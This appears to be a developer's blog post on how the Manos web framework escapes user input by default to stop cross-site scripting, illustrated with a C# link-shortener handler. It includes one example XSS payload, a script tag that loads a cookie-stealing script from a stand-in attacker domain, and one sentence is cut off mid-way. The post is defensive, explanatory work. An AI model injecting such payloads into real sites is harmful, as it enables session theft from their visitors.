I’ve been working on making Manos more secure by default. One of the big things I worry about is XSS attacks. I’m sure that most people understand XSS attacks, but here’s a quick example of how things could go bad.

In the Shorty app that’s included in the (upcoming) first release of Manos, we have a method like this:

 void SubmitLink (Shorty app, IManosContext ctx, string link)
 {
       // Save the link
 }

and one that looks like this:

void LinkInfo (Shorty app, IManosContext ctx, string id)
 {
     var info = // ... get the link ect.

 ctx.Response.WriteLine (@"<html>
                  <head><title>Welcome to Shorty</title></head>
                     <body>
                        {0} was clicked {1} times.
                     </body>", info.Link, info.Clicks);
}

So imagine someone tried to submit this as a link:

<script type=text/javascript src="http://evildomain.com/steal-cookies.js">

Now any time someone visits the LinkInfo page for that domain, they are going to run the steal-cookies.js script from evildomain.com. Which will presumably steal your cookies. Right?

Wrong. It turns out Manos encodes all user input by default. All strings that come from the url, form data, or as params are not stored as strings, they are stored as an UnsafeString and escaped before being passed into methods as a parameter.

So when our SubmitLink function is called we don’t get “

Its not implemented yet, but there will be a CleanHtml property added eventually. This will get a valid html string from the value, using a white list of allowed elements/attributes.

On going

This helps protect against one attack vector and I think is a good start. However, there are still a lot of other things to worry about. The next issue I want to work on is Cross-site request forgery attacks.

As always, and feedback or advice is appreciated.